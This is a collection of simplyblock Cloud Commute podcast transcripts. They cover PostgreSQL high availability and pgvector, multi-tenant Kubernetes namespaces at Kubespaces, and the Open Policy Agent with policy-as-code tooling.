With the Kubernetes approach or the container approach, as long as your storage wasn’t corrupted, you can just bring up a new container to represent that storage. And you can actually have a situation where the primary goes down because maybe it got OOM killed for some reason. It can actually go down, get a new container provisioned, and come back up before the monitors even notice that there was an outage and the switch to a replica and promote it. There’s a whole mechanism of systems in there to kind of reduce the amount of timeline switches and other kind of complications behind the scenes. So you have a cohesive, stable timeline. You maximize your uptime. They’ve got layers to redirect connections from the outside world through either traffic or some other kind of proxy to get into your actual cluster. You always get an endpoint somehow. And that’s something that was horribly wrong, but that’s true for anything. But the ethos of your machines aren’t important. It spoke to me a little bit because it brings you to a level that sure, their hardware is great. And I actually prefer it. I’ve got servers in my basement specifically for testing clusters and Postgres and whatnot. But if you have the luxury of provisioning what you need at the time, if I want more compute nodes, like I said, show my image, bring up a new one that’s got more resources allocated to it, suddenly I’ve grown vertically. And that’s something you can’t really do with bare hardware, at least not very easily.

So then I was like, well, maybe this whole container thing isn’t really a problem, right? So yeah, it’s all because of my time in 2ndQuadrant and Gabriele’s team that high availability does belong in the cloud. And you can run production in the cloud on Kubernetes and containers. And in fact, I encourage it.

Chris Engelbert: I love that. I love that. I also think high availability in cloud, and especially cloud native are concepts that are perfectly in line and perfectly in sync. Unfortunately, we’re out of time. I didn’t want to stop you, but I think we have to invite you again and keep talking about that. But one last question. One last question. By the way, I love when you said that containers were a new thing like 10 years ago, except for you came from the Solaris or BSD world where those things were –

Shaun Thomas: Jails!

Chris Engelbert: But it’s still different, right? You didn’t have this orchestration layer on top. The whole ecosystem evolved very differently in the Linux space. Anyway, last question. What do you think is the next big thing? What is upcoming in the Postgres, the Linux, the container world, what do you think is amazing on the horizon?

Shaun Thomas: I mean, I hate to be cliche here, but it’s got to be AI. If you look at pgvector, it’s basically allowing you to do vectorized similar researches right in Postgres. And I think Timescale even released pgvectorscale, which is an extension that makes pgvector even better. It makes it apparently faster than dedicated vector databases like Pinecone. And it’s just an area that if you’re going to do any kind of result, augmented generation, like RAG searches, or if you’re doing any LLM work at all, if you’re building chatbots, or if you’re just doing, like I said, augmented searches, any of that kind of work, you’re going to be wanting your data that’s in Postgres already, right? You’re going to want to make that available to your AI. And the easiest way to do that is with pgvector.

Tembo even wrote an extension we call pg_vectorize, which automatically maintains your embeddings, which is how you kind of interface your searches with the text. And then you can feed that back into an LLM. It also has the ability to do that for you. Like it can send messages directly to OpenAI. We can also interface with arbitrary paths so you can set up an Ollama or something on a server or locally. And then you can set that to be the end target. So you can even keep your messages from hitting external resources like Microsoft or OpenAI or whatever, just do it all locally. And that’s all very important. So that I think is going to be– it’s whatever one– not either one, but a lot of people are focusing on it. And a lot of people find it annoying. It’s another AI thing, right? But I wrote two blog posts on this where I wrote a RAG app using some Python and pgvector. And then I wrote a second one where I used pg_vectorize and I cut my Python code by like 90%. And it just basically talks to Postgres. Postgres is doing it all. And that’s because of the extension ecosystem, right? And that’s one of the reasons Postgres is kind of on the top of everyone’s mind right now because it’s leading the charge. And it’s bringing a lot of people in that may not have been interested before.

Chris Engelbert: I love that. And I think that’s a perfect sentence to end the show. The Postgres ecosystem or extension system is just incredible. And there’s so much stuff that we’ve seen so far and so much more stuff to come. I couldn’t agree more.

Shaun Thomas: Yeah, it’s just the beginning, man.

Chris Engelbert: Yeah, let’s hope that AI is not going to try to build our HA systems. And I’m happy.

Shaun Thomas: Maybe not yet, yeah.

Chris Engelbert: Yeah, not yet at least. Exactly. All right, thank you for being here. It was a pleasure. As I said, I think I have to invite you again somewhere in the future.

Shaun Thomas: More than willing.

Chris Engelbert: And to the audience, thank you for listening in again. I hope you come back next week. And thank you very much. Take care.

The post How I designed PostgreSQL High Availability with Shaun Thomas from Tembo (video + interview) appeared first on simplyblock.

Easy Developer Namespaces with Multi-tenant Kubernetes with Alessandro Vozza from Kubespaces

Chris Engelbert — Fri, 14 Jun 2024 12:07:20 +0000

This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site .

In this installment of podcast, we’re joined by Alessandro Vozza ( Twitter/X , Github ) , a prominent figure in the Kubernetes and cloud-native community , who talks about his new project, Kubespaces, which aims to simplify Kubernetes deployment by offering a namespace-as-a-service. He highlights the importance of maintaining the full feature set of Kubernetes while ensuring security and isolation for multi-tenant environments. Alessandro’s vision includes leveraging the Kubernetes API to create a seamless, cloud-agnostic deployment experience, ultimately aiming to fulfill the promises of platform engineering and serverless computing. He also discusses the future trends in Kubernetes and the significance of environmental sustainability in technology.

Chris Engelbert: Hello, everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today, I have another incredible guest. I know I say that every time, but he’s really incredible. He’s been around in the Kubernetes space for quite a while. And I think, Alessandro, the best way is just to introduce yourself. Who are you? What have you done in the past, and what are you doing right now?

Alessandro Vozza: Thank you for having me. Well, I’m Alessandro, yes, indeed. I’ve been around for some time in the cloud-native community. I’m Italian, from the south of Italy, and I moved to Amsterdam, where I live currently, about 20 years ago, to get my PhD in chemistry. And then after I finished my PhD, that’s my career. So I went through different phases, always around open source, of course. I’ve been an advocate for open source, and a user of open source since the beginning, since I could lay my hands on a keyboard.

That led me to various places, of course, and various projects. So I started running the DevOps meetup in Amsterdam back in the day, 10, 11 years ago. Then from there, I moved to the OpenStack project and running the OpenStack community. But when I discovered Kubernetes, and what would become the Cloud Native Computing Foundation, I started running the local meetup. And that was kind of a turning point for me. I really embraced the community and embraced the project and started working on the things. So basically what I do is organize the meetup and organize the KCDs, the Kubernetes Community Days in Amsterdam, in Utrecht, around the country. That kind of led me through a natural process to be a CNCF Ambassador, which are people that represent or are so enthusiastic about the way the Cloud Native Computing Foundation works and the community, that are naturally elected to be the face or the ambassadors for the project, for the mission.

At this moment, I still do that. It’s my honor and pleasure to serve the community, to create, to run monthly meetups and KCDs and help other communities thrive as well. So the lessons learned in the Netherlands, in the meetups and in the conferences, we try to spread them as much as possible. We are always available for other communities to help them thrive as well. So that’s been me in a nutshell. So all about community. I always say I’m an average programmer, I’m an average engineer, but where I really shine is to organize these events and to get the people together. I get a kick out of a successful event where people form connections and grow together. So that’s what drives me in my very core.

Chris Engelbert: I like how you put this. You really shine in bringing engagement to the community, helping people to shine themselves, to grow themselves. I think that is a big part of being a developer advocate or in the developer relations space in general. You love this sharing of information, helping other people to get the most out of it.

Alessandro Vozza: Actually, I used to be, or I still do play the bass, electric bass and double bass. And the bass player stays in the back next to the drummer and he creates the conditions so the other members of the band shine. So the guitar player usually stays in front, the bass player is the guy that stays back and is happy to create the foundations and cover the music to really shine. And that’s maybe my nature. So maybe it reflects from the fact that I always love playing the bass and being that guy in a band.

Chris Engelbert: I love that. That’s a great analogy. I never thought about that, but that is just brilliant. And I actually did the same thing in the past, so there may be some truth to that. So we met a few weeks ago in Amsterdam, actually at AWS Summit Amsterdam.

And I invited you because I thought you were still with the previous company, but you’re doing something new right now. So before that, you were with Solo.io , an API gateway, networking, whatever kind of thing. But you’re doing your own thing. So tell us about it.

Alessandro Vozza: Yeah. So it was a great year doing DevRel and so much fun going and speaking about service mesh, which is something that I really believe it’s going to, it’s something that everybody needs, but I know it’s a controversial, but it’s something that I really, you got to believe in it. You know, when you are a developer advocate, when you represent a company or community, the passion is important. You cannot have passion for something you don’t believe in, for something that you don’t completely embrace. And that was great. And we had so much fun for about a year or a bit more. But then I decided that I’m too young to settle, as always, like I’m only 48, come on, I have a good 10 years of engineering work to do. So I decided that I wanted to work on something else, on something mine, more, more mine, more an idea that I had, and I want to see it develop.

Filling a gap in the market and a real need for developers to have a flexible environment, environments to deploy their applications. So fulfilling the promises of platform engineering as a self-service platform to deploy applications. So the idea goes around the namespace. What is a namespace? Of course, it’s what the unit of deployment in Kubernetes really, it’s this magical place where developers can be free and can deploy their application without the control within the guard rails of whatever the system means, the cluster administrator sets.

But developers really love freedom. So developers don’t want to have to interact even with the sysops or sysadmins. In fact, developers love Heroku. So Heroku, I think, is the hallmark of developer experience where you just can deploy whatever you want, all your code, all your applications in a place and it’s automatically exposed and you can manage by yourself everything about your application.

I want to reproduce that. I want to get inspired by that particular developer experience. But because I love Kubernetes, of course, and because I really believe that the Kubernetes APIs are the cornerstone, the golden standards of cloud-native application deployment. So I want to offer the same experience but through the Kubernetes API. So how you do that, and that’s, of course, like this evolving product, me and a bunch of people are still working on, define exactly what does it mean and how it’s going to work. But the idea is that we offer namespace-as-a-service. What really matters to developers is not the clusters, is not the VMs or the networks or all the necessary evil that you need to run namespaces. But what really matters is the namespace, is a place where they can deploy their application. So what if we could offer the best of both worlds, kind of like the promises of serverless computing, right? So you are unburdened by infrastructure. Of course, there is infrastructure somewhere, the cloud is just somebody else’s computer, right? So it’s not magic, but it feels like magic because of the clever arrangement of servers in a way that you don’t see them, but they are still there.

So imagine a clusterless Kubernetes. The experience of Kubernetes, the API really, so all the APIs that you learn to love and embrace without the burden of infrastructure. That’s the core idea.

Chris Engelbert: So that means it’s slightly different from those app platforms like Fargate or what’s the Azure and GCP ones, Cloud Run and whatever. So it’s slightly different, right? Because you’re still having everything Kubernetes offers you. You still have your CRDs or your resource definitions, but you don’t have to manage Kubernetes on its own because it’s basically a hosted platform. Is that correct?

Alessandro Vozza: Yeah. So those platforms, of course, they are meant to run single individual application pods, but they don’t feel like Kubernetes. I don’t understand. For me, because I love it so much, I think developers love to learn also new things. So developers will love to have a Kubernetes cluster where they can do what they like, but without the burden of managing it. But this CloudRun and ACI and Fargate, they are great tools, of course, and you can use them to put together some infrastructure, but they’re still limiting in what you can deploy. So you can deploy this single container, but it’s not a full-fledged Kubernetes cluster. And I think it’s still tripling in a way that you don’t have the full API at your disposal, but you have to go through this extra API layer. It’s a bespoke API, so you got to learn Cloud Run, you got to learn ACI, you got to learn Fargate, but they are not compatible with each other. They are very cloud specific, but a Kubernetes API is cloud agnostic, and that’s what I want to build.

What we seek to build is to have a single place where you can deploy in every cloud, in every region, in some multi-region, multi-cloud, but through the same API layer, which is the pure and simple Kubernetes API.

Chris Engelbert: I can see there’s two groups of people, the ones that say, just hide all the complexity from Kubernetes. And you’re kind of on the other side, I wouldn’t say going all the way, like you want the complexity, but you want the feature set, the possibilities that Kubernetes still offers you without the complexity of operating it. That’s my feeling.

Alessandro Vozza: Yeah, the complexity lies in the operation, in the upgrades, the security, to properly secure a Kubernetes cluster, it takes a PhD almost, so there’s a whole sort of ecosystem dedicated to secure a cluster. But in Kubespaces, we can take care of it, we can make sure that the clusters are secure and compliant, while still offering the freedom to the developers to deploy what they need and they like. I think we underestimate the developers, so they love to tinker with the platform, so they love freedom, they don’t want the burden, even to interact with the operation team.

And so the very proposal here is that you don’t need an operation team, you don’t need a platform engineering team, it’s all part of the platform that we offer. And you don’t even need an account in Azure or AWS, you can select which cloud and which region to deploy to completely seamlessly and without limits.

Chris Engelbert: Okay, so that means you can select, okay, I need a Kubernetes cluster namespace, whatever you want to call it, in Azure, in Frankfurt or in Western Europe, whatever they call it.

Alessandro Vozza: Yeah. Okay, so yeah, it is still a thing, so people don’t want to be in clouds that don’t trust, so if you don’t want to be in Azure, you should not be forced to. So we offer several infrastructure pieces, clusters, even if the word cluster doesn’t even appear anywhere, because it’s by design, we don’t want people to think in terms of clusters, we want people to think in terms of namespaces and specifically tenants, which are just a collection of namespaces, right? So it’s a one namespace is not going to cut it, of course, you want to have multiple to assign to your teams, to group them in environments like that, prod or test, and then assign them to your team, to your teams, so they can deploy and they’re fun with their namespaces and tenants.

Chris Engelbert: Yeah, I think there’s one other thing which is also important when you select a cloud and stuff, you may have other applications or other services already in place, and you just want to make sure that you have the lowest latency, you don’t have to pay for throughput, and stuff like that. Something that I always find complicated with hosted database platforms, to be honest, because you have to have them in the same region somehow.

Alessandro Vozza: Yeah, that’s also a political reason, right? Or commercial reason that prevents you from that.

Chris Engelbert: Fair, fair. There’s supposed to be people that love Microsoft for everything.

Alessandro Vozza: I love Microsoft, of course, been there for seven years. I’m not a fanboy, maybe I am a little, but that’s all right. Everybody, that’s why the world is a beautiful place. Everybody is entitled to his or her opinion, and that’s all right.

Chris Engelbert: I think Microsoft did a great job with the cloud, and in general, a lot of the changes they did over the last couple of decades, like the last two decades, I think there are still the teams like the Office and the Windows team, which are probably very enterprise-y still, but all of the other ones. For me specifically, the Java team at Microsoft, they’re all doing a great job, and they seem to be much easier and much more community driven than the others.

Alessandro Vozza: I was so lucky because I was there, so I saw it with my own eyes, the unfolding of this war machine of Microsoft. There was this tension of beating Amazon at their own game. Seven years ago, we had this mission of really, really demonstrating that Microsoft was serious about open source, about cloud, and it paid off, and they definitely put Microsoft back on the map. I’m proud and very, very grateful to be here. You have been there, Microsoft joining the Linux Foundation, the Cloud Native Computing Foundation really being serious about Cloud Native, and now it works.

Chris Engelbert: I agree. The Post-Balmer era is definitely a different world for Microsoft. All right, let’s get back to Kubespaces, because looking at the time, we’re at 17. You said it’s, I think it’s a shared resource. You see the Kubernetes as a multi-tenant application, so how does isolation work between customers? Because I think that is probably a good question for a lot of security-concerned people.

Alessandro Vozza: Yeah, so of course, in the first incarnation would be a pure play SaaS where you have shared tenants. I mean, it’s an infrastructure share among customers. That’s by design the first iteration. There will be more, probably where we can offer dedicated clusters to specific customers. But in the beginning, it will be based on a mix of technologies between big cluster and Firecracker, which ensure better isolation of your workload. So it is indeed one piece of infrastructure where multiple customers will throw their application, but you won’t be able to see each other. Everybody gets his own API endpoint for Kubernetes API, so you will not be able. RBAC is great, and it works, of course, and it’s an arcane magic thing and it’s arcane knowledge. Of course, to properly do RBAC is quite difficult. So instead of risking to make a mistake in some cluster role or role, and then everybody can see everything, you better have isolation between tenants. And that comes with a popular project like big cluster, which has been already around for five years. So that’s some knowledge there already.

And even an other layer of isolation, things like Kata Container and Firecracker, they provide much better isolation at the container runtime level. So even if you escape from the container, from the jail of the container, you only can see very limited view of the world and you cannot see the rest of the infrastructure. So that’s the idea of isolating workloads between customers. You could find, of course, flaws in it, but we will take care of it and we will have all the monitoring in place to prevent it, it’s a learning experience. We want to prove to ourselves first and to customers that we can do this.

Chris Engelbert: Right. Okay. For the sake of time, a very, very… well, I think because you’re still building this thing out, it may be very interesting for you to talk about that. I think right now it’s most like a one person thing. So if you’re looking for somebody to help with that, now is your time to ask for people.

Alessandro Vozza: Yeah. If the ideas resonate and you want to build a product together, I do need backend engineers, front-end engineers, or just enthusiastic people that believe in the idea. It’s my first shot at building a product or building a startup. Of course, I’ve been building other businesses before, consulting and even a coworking space called Cloud Pirates. But now I want to take a shot at building a product and see how it goes. The idea is sound. There’s some real need in the market. So it’s just a matter of building it, build something that people want. So don’t start from your ideas, but just listen to what people tell you to build and see how it goes. So yeah, I’ll be very happy to talk about it and to accept other people’s ideas.

Chris Engelbert: Perfect. Last question, something I always have to ask people. What do you think will be the next big thing in Kubernetes? Is it the namespace-as-a-service or do you see anything else as well?

Alessandro Vozza: If I knew, of course, in the last KubeCon in Paris, of course, the trends are clear, this AI, this feeding into AI, but also helping AI thrive from Cloud Native. So this dual relationship with the Gen AI and the new trends in computing, which is very important. But of course, if you ask people, there will be WebAssembly on the horizon, not replacing containers, but definitely becoming a thing. So there are trends. And that’s great about this community and this technologies that it’s never boring. So there’s always something new to learn. And I’m personally trying to learn every day. And if it’s not WebAssembly, it’s something else, but trying to stay updated. This is fun. And challenges your convention, your knowledge every day. So this idea from Microsoft that I learned about growth mindset, what you should know now is never enough if you think ahead. And it’s a beautiful thing to see. So it’s something that keeps me every day.

Now I’m learning a lot of on-premise as well. These are also trying to move workloads back to the data centers. There are reasons for it. And one trend is actually one very important one. And I want to shout out to the people in the Netherlands also working on it is green computing or environmental sustainability of software and infrastructure. So within the CNCF, there is the Technical Advisory Group environmental sustainability, which we’re collaborating with. We are running the environmental sustainability week in October. So worldwide events all around getting the software we all love and care to run greener and leaner and less carbon intense. And this is not just our community, but it’s the whole planet involved. Or at least should be concerned for everybody concerned about the future of us. And I mean, I have a few kids, so I have five kids. So it’s something that concerns me a lot to leave a better place than I found it.

Chris Engelbert: I think that is a beautiful last statement, because we’re running out of time. But in case you haven’t seen the first episode of a podcast, that may be something for you because we actually talked to Rich Kenny from Interact and they work on data center sustainability, kind of doing the same thing on a hardware level. Really, really interesting stuff. Thank you very much. It was a pleasure having you. And for the audience, next week, same time, same place. I hope you’re listening again. Thank you.

Alessandro Vozza: Thank you so much for having me. You’re welcome.

The post Easy Developer Namespaces with Multi-tenant Kubernetes with Alessandro Vozza from Kubespaces appeared first on simplyblock.

Policy Management at Cloud-Scale with Anders Eknert from Styra (video + interview)

Chris Engelbert — Fri, 07 Jun 2024 12:09:23 +0000

This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site.

In this installment of podcast, we’re joined by Anders Eknert ( Twitter/X , Personal Blog ), a Developer Advocate for Styra, who talks about the functionality of OPA, the Open Policy Agent project at Styra, from a developer’s perspective, explaining how it integrates with services to enforce policies. The discussion touches on the broader benefits of a unified policy management system and how OPA and Styra DAS (Declarative Authorization Service) facilitate this at scale, ensuring consistency and control across complex environments. See more information on what the Open Policy Agent project is, what ‘Policy as Code’ is and what tools are available as well as how OPA can help make simplyblock more secure. Also see interview transcript section at the end.

Key Learnings

What is the Open Policy Agent (OPA) Project?

The Open Policy Agent (OPA) is a framework designed for defining and running policies as code, decoupled from applications, for use cases like authorization, or policy for infrastructure. It allows organizations to maintain a unified approach to policy management across their entire technology stack. Styra, the company behind OPA, enhances its capabilities with two key products: Styra DAS and an enterprise distribution of OPA. Styra DAS is a commercial control plane for managing OPA at scale, handling the entire policy lifecycle. The enterprise distribution of OPA features a different runtime that consumes less memory, evaluates faster, and can connect to various data sources, providing more efficient and scalable policy management solutions.

What is Policy as Code?

Policy as code is a practice where policies and rules are defined, managed, and executed using code rather than through manual processes. This approach allows policies to be versioned, tested, and automated, similar to software development practices. By treating policies as code, organizations can ensure consistency, repeatability, and transparency in their policy enforcement, making it easier to manage and audit policies across complex environments. Tools like Open Policy Agent (OPA) (see above) facilitate policy as code by providing a framework to write, manage, and enforce policies programmatically.

What are the available Policy as Code Tools?

Several tools are available for implementing Policy as Code. Some of the prominent ones include:

Open Policy Agent (OPA) : An open-source framework, to easily write, manage, test, and enforce policies for infrastructure modifications, service communication, and access permissions. See our podcast episode with Anders Eknert from Styra .
HashiCorp Sentinel : A policy as code framework deeply integrated with HashiCorp products like Terraform, Vault, and Consul.
Kubernetes Policy Controller (Kyverno) : A Kubernetes-native policy management tool that allows you to define, validate, and enforce policies for Kubernetes resources.
Azure Policy : A service in Microsoft Azure for enforcing organizational standards and assessing compliance.

These tools help ensure that policies are codified, version-controlled, and easily integrated into CI/CD pipelines, providing greater consistency and efficiency in policy management.

How will OPA help to Make Simplyblock even more Secure?

Integrating Open Policy Agent (OPA) with simplyblock and Kuberntes can enhance security in several ways: Centralized Policy Management: OPA allows defining and enforcing policies centrally, ensuring consistent security policies across all services and environments. Fine-Grained Access Control: OPA provides detailed control over who can access what, reducing the risk of unauthorized access. Policies can, for example, be used to limit access to simplyblock block devices or prevent unauthorized write mounts. Compliance and Auditing: OPA’s policies can be versioned and audited, helping simplyblock to meet your compliance requirements. Using simplyblock and OPA, you have proof of who was authorized to access your data storage at any point in time. Dynamic Policy Enforcement: OPA can enforce policies in real-time, responding to changes quickly and preventing security breaches.

Transcript

Chris Engelbert: Hello everyone, welcome back to this week’s episode of simplyblock’s Cloud Commute Podcast. Today I have a guest with me that I actually never met in person as far as I know. I don’t think we have. No. Maybe just say a few words about you, where you’re from, who you are, and what you’re working with.

Anders Eknert: Sure, I’m Anders. I live here and work in Stockholm, Sweden. I work as a developer advocate, or a DevRel lead even, for Styra, the company behind the Open Policy Agent (OPA) project.

I’ve been here for, I think it’s three and a half years or so. Before that, I was at another company where I got involved in the OPA project. We had a need for a solution to do access control or authorization across a very diverse and complex environment. We had development teams in 12 different countries, seven different programming languages in our cluster, and it was just a big mess. Our challenge was how to do authorization in that kind of environment without having to go out to all of these teams and try to coordinate development work with each change we needed to do.

So that’s basically how I got involved in the OPA project. OPA emerged as a good solution to our problem at that time and, yeah, all these years later I’m still here and I’m having a lot of fun.

Chris Engelbert: All right, cool. So you mentioned Styra, I always thought it was Styra [Steera] to be honest, but okay, fair enough.

Anders Eknert: Yeah, no, the Swedish pronunciation would be ‘Steera’. So you’re definitely right. It is a Swedish word, which means to steer or to navigate.

Chris Engelbert: Oh, okay, yeah.

Anders Eknert: So you’re absolutely right. I’m just using the Americanized, the bastardized pronunciation.

Chris Engelbert: That’s fair, probably because I’m German that would be my initial thought. And it kind of makes sense. So in German it would probably be “steuern” or something.

All right, so tell us a little bit about Styra. You already mentioned the OPA project. I guess we’re coming back to that in a second, but maybe a little bit about the company itself.

Anders Eknert: Yeah, sure. Styra was founded by the creators of OPA and the idea, I think, is like the main thing. Everything at Styra revolves around OPA and I think it always has and I’m pretty sure it always will to some extent.

So what Styra does is we created and maintain the OPA project. We created and maintain a lot of the things you’ll find in the ecosystem around OPA and Styra. And also of course we’re a commercial company. So there are two products that are both based around OPA. One is Styra DAS, which is a commercial control plane, which allows you to manage OPA at scale. So like from the whole kind of policy lifecycle. And then there’s an enterprise distribution of OPA as well, which has basically a whole different runtime, which allows it to consume much less memory, evaluate faster, connect to various data sources and so on. So basically both the distributed component and the centralized component.

Chris Engelbert: Right, okay. You mentioned OPA a few times, I think you already mentioned what it really means, but maybe we need to dig into that a little bit deeper. So I think OPA is the Open Policy Agent. And if I’m not mistaken, it’s a framework to actually build policy as we call it policy as code.

Anders Eknert: That’s right, that’s right. So yeah, the idea behind OPA is basically that you define your policies as code, but not just code as like any other code running or which is kind of coupled to your applications, but rather that you try and decouple that part of your code and move it outside of your application so you can work with that in isolation.

And some common use cases could be things like authorization. And I mentioned before this need where you have like a complex environment, you have a whole bunch of services and you need to control authorization. How do we do authorization here? How do we make changes to this at runtime? How do we know what authorization decisions got logged or what people did in our systems? So how do we do auditing of this? So that is one type of policy and it’s a very common one.

But it doesn’t stop there. Basically anywhere you can define rules, you can define policy. So other common use cases are policy for infrastructure where you want to say like, I don’t want to allow pods to run in my Kubernetes cluster unless they have a well-defined security context or if they don’t allow mounts of certain types and so on. So you basically define the rules for your infrastructure. And this could be things like Terraform plans, Kubernetes resource manifests, or simply just JSON and YAML files on disk. So there are many ways to, and many places where you might want to enforce policy. And the whole idea behind OPA is that you have one way of doing it and it’s a unified way of doing it. So there are many policy engines out there and most of them do this for one particular use case. So there might be a policy engine that does authorization and many others that do infrastructure and so on. But that all means that you’re still going to end up with this problem where policy is scattered all over the place, it looks different, it logs different and so on. While with OPA, you have one unified way of doing this and to work with policy across your whole stack and organization. So that is kind of the idea behind OPA.

Chris Engelbert: So that means if I’m thinking about something like simplyblock being a cloud native block storage, I could prevent services from mounting our block devices through the policies, right? So something like, okay, cool.

Anders Eknert: Right

Chris Engelbert: You mentioned authorization, I guess that is probably the most common thing when people think about policy management in general. What I kind of find interesting is, in the past, when you did those things, there was also often the actual policies or the rules for permission configuration or something. It was already like a configuration file, but with OPA, you kind of made this like the first first-class spot. Like it shouldn’t be in your code. Here’s the framework that you can just drop into or drop before your application, I think, right? It’s not even in the application itself.

Anders Eknert: No, I guess it depends, but most commonly you’ll have like a separate policy repo where that goes. And of course, a benefit of that is like, we’re not giving up on code. Like we still want to treat policy as code. We want to be able to test it. We want to be able to review it. We want to work with all of these things like lint it or what not. We want to work with all these good tools and processes that we kind of established for any development. We want to kind of piggyback on that for policy just as we do for anything else. So if you want to change something in a policy, the way you do that is you submit a pull request. It’s not like you need to call a manager or you need to submit a form or something. That is how it used to be, right? But we want to, as developers, we want to work with these kinds of things like we work with any other type of code.

Chris Engelbert: Right. So how does it look like from a developer’s point of view? I mean, you can use it to, I think automatically create credentials for something like Postgres. Or is that the DAS tool? Do you need one of the enterprise tools for that?

Anders Eknert: No, yeah, creating credentials, I guess, you could definitely use OPA for that. But I think in most cases, what you use OPA for is basically to make decisions that are either most commonly they’re yes or no. ‘So should we allow these credentials?’ would be probably a better use case for OPA. ‘No, we should not allow them because they’re not sufficiently secure’ or what have you. But yeah, you can use OPA and Rego, the policy language, for a whole lot of things and a whole lot of things that we might not have decided for initially. So as an example, like there’s this linter for Rego, which is called Regal that I have been working on for the past year or so. And that linter itself is written mostly in Rego. So we kind of use Rego to define the rules of what you can do in Rego.

Chris Engelbert: Like a small exception.

Anders Eknert: Yeah, yeah. There’s a lot of that.

Chris Engelbert: All right. I mean, you know that your language is good when you can build your own stuff in your own language, right?

Anders Eknert: Exactly.

Chris Engelbert: So coming back to the original question, like what does it look like from a developer’s point of view if I want to access, for example, a Postgres database?

Anders Eknert: Right. So the way OPA works, it basically acts as a layer in between. So you probably have a service between your database and your user or another service. So rather than having that user or service go right to the database, they’d query that service for access. And in that service, you’d have an integration with OPA, either with OPA running as another service or running embedded inside of that service. And that OPA would determine whether access should be allowed or not based on policy and data that it has been provided.

Chris Engelbert: Right. Okay, got it, got it. I actually thought that, maybe I’m wrong because I’m thinking one of the enterprise features or enterprise products, I thought it was its own service that handles all of that automatically, but maybe I misunderstood to be honest. So there are, as you said, there’s OPA enterprise and there is DAS, the declarative authorization service.

Anders Eknert: Yeah, yeah, that’s right. You got it right. I remembered right.

Chris Engelbert: So maybe tell us a little bit about those. Maybe I’m mixing things up here.

Anders Eknert: Sure. So I talked a bit about OPA and OPA access to distributed component or the decision point. So that’s where the decisions are made. So OPA is going to tell the user or another service, should we allow this or not. And once you start to have tens or twenties or hundreds or thousands of these OPAs running in your cluster, and if you have a distributed environment and you want to do like zero trust, microservice authorization or whatnot, you’re going to have hundreds or thousands of OPAs. So the problem that Styra DAS solves is essentially like, how do we manage this at scale? How do I know what version or which policy is deployed in all these environments? How do I manage policy changes between like dev, test, prod, and so on? But it kind of handles the whole policy lifecycle. We talked about testing before. We talked about things like auditing. How are these things logged? How can I search these logs? Can I use these logs to replay a decision and see, like, if I did change this, would it have an impact on the outcome and so on?

So it’s basically the centralized component. If OPA is the distributed component, Styra DAS provides a centralized component which allows things like a security team or even a policy team to kind of gain this level of control that would previously be missing when you just let any developer team handle this on their own.

Chris Engelbert: So it’s a little bit like fleet management for your policies.

Anders Eknert: Yes, that is right.

Chris Engelbert: Okay, that makes sense. And the DAS specifically, that is the management control or the management tool?

Anders Eknert: Yeah, that it is.

Chris Engelbert: Okay.

Anders Eknert: And then the enterprise OPA is a drop-in replacement for OPA adding a whole bunch of features on top of it, like reduced memory usage, direct integrations with data sources, things like Kafka streaming data from Kafka and so on and so forth. So we provide commercial solutions both for the centralized part and the distributed part.

Chris Engelbert: Right, okay. I think now I remember where my confusion comes from. I think I saw OPA Enterprise and saw all the services which are basically source connectors. So I think you already mentioned Kubernetes before, but how does that work in the Kubernetes environment? I think you can, as you said, deploy it as its own service or run it embedded in microservices. How would that apply together somehow? I mean, we’re a cloud podcast.

Anders Eknert: Yeah, of course, of course. So in the context of Kubernetes, there’s basically two use cases. Like the first one we kind of covered, it’s authorization in the level, like inside of the workloads. Our applications need to know that the user trying to do something is authorized to do so. In that context, you’d normally have OPA running as a sidecar or in a gateway or as part of like an envoy proxy or something like that. So it basically provides a layer on top or before any request is hitting an actual application.

Chris Engelbert: In the sense of user operated.

Anders Eknert: Yeah, exactly. So on the next content or the next use case for OPA and Kubernetes is commonly like admission control, where Kubernetes itself or the Kubernetes API is protected by OPA. So whenever you try and make a modification to Kubernetes or the database etcd, the Kubernetes API reaches out to OPA to ask, like should this be allowed or not? So if you try and deploy a pod or a deployment or I don’t know, what have you, what kind of resources, OPA will be provided at resource. Again, it’s just JSON or YAML. So anything that’s JSON or YAML is basically what OPA has to work with. It doesn’t even know, like OPA doesn’t know what a Kubernetes resource is. It just seems like here’s a YAML document or here’s a JSON document. Is this or that property that I expect, is it in this JSON blob? And does it have the values that I need? If it doesn’t, it’s not approved. So we’re going to deny that. So basically just tells the Kubernetes API, no, this should not be allowed and the Kubernetes API will enforce that. So the user will see this was denied because this or that reason.

Chris Engelbert: So that means I can also use it in between any Kubernetes services, everything or anything deployed into Kubernetes, I guess, not just the Kubernetes API.

Anders Eknert: Yeah, anything you try and deploy, like for modifications, is going to have to pass through the Kubernetes API.

Chris Engelbert: That’s a really interesting thing. So I guess going back to the simplyblock use case, that would probably be where our authorization layer or approval layer would sit, basically either approving or denying the CSI deployment.

Anders Eknert: Yeah.

Chris Engelbert: Okay, that makes sense. So because we’re already running out of time, do you think that, or well, I think the answer is yes, but maybe you can elaborate a little bit on that. Do you think that authorization policies or policies in general became more important with the move to cloud? Probably more people have access to services because they have to, something like that.

Anders Eknert: Yeah, I’d say like they were probably just as important back in the days. What really changed with like the invent of cloud and this kind of automation is the level of scale that any individual engineer can work with. Like in the past, you’d have an infra engineer would perhaps manage like 20 machines or something like that. While today they could manage thousands of machines or virtual machines in cloud instances or whatnot.

And once you reach that level of scale, there’s basically no way that you can do policy like manually, that you have a PDF document somewhere where it says like, you cannot deploy things unless these conditions are met. And then have engineers sit and try and make an inventory of what do we have here? And are we all compliant? That doesn’t work.

So that is basically the difference today from how policy was handled in the past. We need to automate every kind of policy check as well just as we automated infrastructure and so with cloud.

Chris Engelbert: Yeah, that makes sense. I think the scale is a good point about that. It was not something I thought about it. I thought in the sense or my thought was more in the sense of like you have probably much bigger teams than you had in the past, which also makes it much more complicated to manage policies or make sure that just like the right people have access. And many times have to have this like access because somebody else is on vacation and it will never be removed again. We all know how it worked in the past.

